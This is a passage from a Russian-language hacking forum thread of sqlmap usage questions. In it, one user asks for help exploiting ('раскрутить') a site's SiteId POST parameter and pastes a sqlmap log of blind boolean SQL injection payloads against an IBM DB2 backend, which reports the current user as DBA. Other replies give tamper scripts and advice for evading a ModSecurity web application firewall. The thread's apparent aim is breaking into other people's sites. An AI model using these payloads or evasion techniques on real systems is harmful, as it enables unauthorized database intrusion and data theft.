Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

Page 37 of 58
  1. cna

    cna New Member

    Joined:
    10 Feb 2018
    Messages:
    10
    Likes Received:
    0
    Reputations:
    1
    считаю если с прив все ок то помоему нельзя залиться только если не понятно почему не выдает пути к специальной папке вне корня надо инклуд или как еще отуда дальше) и откуда то

    интересно мускуль еще не научился как то кампастить с отведенной папки то?)
    ну тут или обойти исполнения или надо понять как можно обойти эту опцию)
     
    #721 cna, 1 Aug 2018
  2. Sentureg

    Sentureg New Member

    Joined:
    31 Jul 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Помогите раскрутить сайт
    Parameter: SiteId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Vector: AND [INFERENCE]


    Code:
    [14:07:25] [INFO] the back-end DBMS is IBM DB2
back-end DBMS: IBM DB2
[14:07:25] [INFO] fetching current user
[14:07:25] [PAYLOAD] 200001
[14:07:25] [INFO] retrieving the length of query output
[14:07:25] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(51) AND 'PPkh'='PPkh
[14:07:27] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(54) AND 'PPkh'='PPkh
[14:07:27] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(56) AND 'PPkh'='PPkh
[14:07:28] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(57) AND 'PPkh'='PPkh
[14:07:29] [INFO] retrieved:
[14:07:29] [DEBUG] performed 4 queries in 3.84 seconds
[14:07:29] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(66) AND 'PPkh'='PPkh
[14:07:30] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(97) AND 'PPkh'='PPkh
[14:07:33] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(101) AND 'PPkh'='PPkh
[14:07:33] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(119) AND 'PPkh'='PPkh
[14:07:34] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(user AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(120) AND 'PPkh'='PPkh
[14:07:36] [INFO] retrieved:
[14:07:36] [DEBUG] performed 9 queries in 10.87 seconds
current user:   None
[14:07:36] [INFO] testing if current user is DBA
current user is DBA:    True
[14:07:36] [WARNING] schema names are going to be used on IBM DB2 for enumeration as the counterpart to database names on other DBMSes
[14:07:36] [INFO] fetching database (schema) names
[14:07:36] [INFO] fetching number of databases
[14:07:36] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(66) AND 'MrxP'='MrxP
[14:07:39] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(97) AND 'MrxP'='MrxP
[14:07:42] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(101) AND 'MrxP'='MrxP
[14:07:43] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(119) AND 'MrxP'='MrxP
[14:07:44] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(COUNT(schemaname) AS CHAR(254))),CHR(32))) FROM syscat.schemata),1,1)>CHR(120) AND 'MrxP'='MrxP
[14:07:45] [INFO] retrieved:
[14:07:45] [DEBUG] performed 5 queries in 8.49 seconds
[14:07:45] [ERROR] unable to retrieve the number of databases
[14:07:45] [INFO] falling back to current database
[14:07:45] [INFO] fetching current database
[14:07:45] [INFO] retrieving the length of query output
[14:07:45] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(51) AND 'SSnj'='SSnj
[14:07:46] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(54) AND 'SSnj'='SSnj
[14:07:47] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(56) AND 'SSnj'='SSnj
[14:07:47] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(LENGTH(RTRIM(CAST(HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) AS CHAR(254)))) AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(57) AND 'SSnj'='SSnj
[14:07:48] [INFO] retrieved:
[14:07:48] [DEBUG] performed 4 queries in 3.55 seconds
[14:07:48] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(66) AND 'SSnj'='SSnj
[14:07:49] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(97) AND 'SSnj'='SSnj
[14:07:51] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(101) AND 'SSnj'='SSnj
[14:07:54] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(119) AND 'SSnj'='SSnj
[14:07:55] [PAYLOAD] 200001' AND SUBSTR((SELECT HEX(COALESCE(RTRIM(CAST(current server AS CHAR(254))),CHR(32))) FROM SYSIBM.SYSDUMMY1),1,1)>CHR(120) AND 'SSnj'='SSnj
[14:07:59] [INFO] retrieved:
[14:07:59] [DEBUG] performed 9 queries in 13.88 seconds
[14:07:59] [WARNING] on IBM DB2 you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[14:07:59] [CRITICAL] unable to retrieve the database names

[*] shutting down at 14:07:59
    пробывал --hex, --no-cast, не помогает
     
    #722 Sentureg, 4 Aug 2018
  3. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Всем доброго времени суток, использую sqlmap на Kali, насколько мне известно, сканирование пишется в лог, и после повторного сканирования sqlmap берет предыдущие результаты из лога, скажите пожалуйста, как очистить лог? Папку output не обнаружил.
     
    #723 aZohan, 26 Aug 2018
  4. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,229
    Likes Received:
    26,181
    Reputations:
    147
    @aZohan

    обычно

    file:///хоум фолдер/.sqlmap/output
     
    #724 erwerr2321, 26 Aug 2018
  5. h3xp1017

    h3xp1017 Member

    Joined:
    28 Oct 2015
    Messages:
    84
    Likes Received:
    25
    Reputations:
    1
    session.sqlite

    не?
     
    #725 h3xp1017, 26 Aug 2018
  6. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    вы имеете ввиду предыдущую сессию? Не совсем понял вас. Вот еще что думаю, юзаю предустановленный софт sqlmap, может лучше будет склонировать его с git's ?
     
    #726 aZohan, 26 Aug 2018
  7. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    --flush-session Flush session files for current target
    --fresh-queries Ignore query results stored in session file
    Заглядывайте чаще в мануал
     
    #727 cat1vo, 26 Aug 2018
    dmax0fw likes this.
  8. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Всем доброго время суток! По вашему мнению, что лучше использовать: предустановленный sqlmap в kali linux или лучше склонировать с github?
     
    #728 aZohan, 27 Aug 2018
  9. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    498
    Reputations:
    154
    apt-get update && apt-get upgrade && apt-get dist-upgrade
     
    _________________________
    #729 SooLFaa, 30 Aug 2018
    Last edited: 30 Aug 2018
  10. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    а зачем всё это в бэкграунде выполнять?:)
     
    #730 dmax0fw, 30 Aug 2018
  11. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    498
    Reputations:
    154
    Схлопнул второй амперсанд.
     
    _________________________
    #731 SooLFaa, 30 Aug 2018
  12. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Благодарю за ответ. Ежедневно выполняю следующие команды: sudo apt update, sudo apt upgrade. Разницы же нет у команд: sudo apt upgrade, sudo apt full-upgrade и sudo apt dist-upgrade?
     
    #732 aZohan, 30 Aug 2018
  13. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    498
    Reputations:
    154
    Разница есть, но не в данном случае.
     
    _________________________
    #733 SooLFaa, 30 Aug 2018
  14. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    55
    Likes Received:
    5
    Reputations:
    0
    Ребят сори за тупой вопрос

    возможно ли мепу задать через команду
    --batch что бы сначала он сам задавал ответ "N" , но если идет крит подключения , от дампа , он сам отвечал "Y"
     
    #734 Xsite, 3 Sep 2018
  15. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    --answers=ANSWERS Set question answers (e.g. "quit=N,follow=N")
    Там куча разных условий ответа!
    Пример:
    --batch --answers="keep testing=Y,sitemap=Y,skip further tests=N"
     
    #735 cat1vo, 4 Sep 2018
    Last edited: 4 Sep 2018
    panic.ker, dmax0fw and Xsite like this.
  16. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    55
    Likes Received:
    5
    Reputations:
    0
    Спасибо :) так намного проще )
     
    #736 Xsite, 4 Sep 2018
  17. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Всем доброго времени суток, может кто подсказать какой тампер против этого waf идёт "[CRITICAL] WAF/IPS/IDS identified as 'ModSecurity: Open Source Web Application Firewall (Trustwave)'"
    Заранее благодарен.
     
    #737 aZohan, 7 Sep 2018
  18. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    242
    Likes Received:
    445
    Reputations:
    145
    Попробуй:
    Code:
    --tamper "modsecurityzeroversioned.py"
     
    #738 joelblack, 7 Sep 2018
  19. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    буду пробовать эти:
    modsecurityversioned.py окружает полный запрос комментариями
    modsecurityzeroversioned.py окружает комментарии, "0" полным запросом
     
    #739 aZohan, 7 Sep 2018
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    884
    Reputations:
    859
    Вообще суть тамперов, как они работают можно посмотреть в папке sqlmap'a tamper, частенько бывает что в наборе нету нужного, тогда изучаем суть WAF'a, создаем свой тампер и кладем в папочку, дальше просто его подключаем.
     
    _________________________
    #740 winstrool, 7 Sep 2018
    RWD, cat1vo and crlf like this.
(You must log in or sign up to post here.)
Page 37 of 58
Loading...
Similar Threads - Вопросы SQLMap
  1. +

    Ваши вопросы по уязвимостям.

    +, 27 Apr 2015, in forum: Уязвимости
    Replies:
    2,970
    Views:
    979,690
    eminlayer7788
    10 Jun 2022
  2. Kakoytoxaker

    Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд

    Kakoytoxaker, 3 Feb 2009, in forum: Уязвимости
    Replies:
    2
    Views:
    88,029
    ettee
    28 Jun 2009
  3. Lesnoy_chelovek

    SQL-сканер sqlmap

    Lesnoy_chelovek, 5 Nov 2007, in forum: Уязвимости
    Replies:
    0
    Views:
    3,957
    Lesnoy_chelovek
    5 Nov 2007
  4. darky

    Ваши вопросы по уязвимостям.

    darky, 4 Aug 2007, in forum: Уязвимости
    Replies:
    24,126
    Views:
    4,396,710
    Suicide
    27 Apr 2015
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.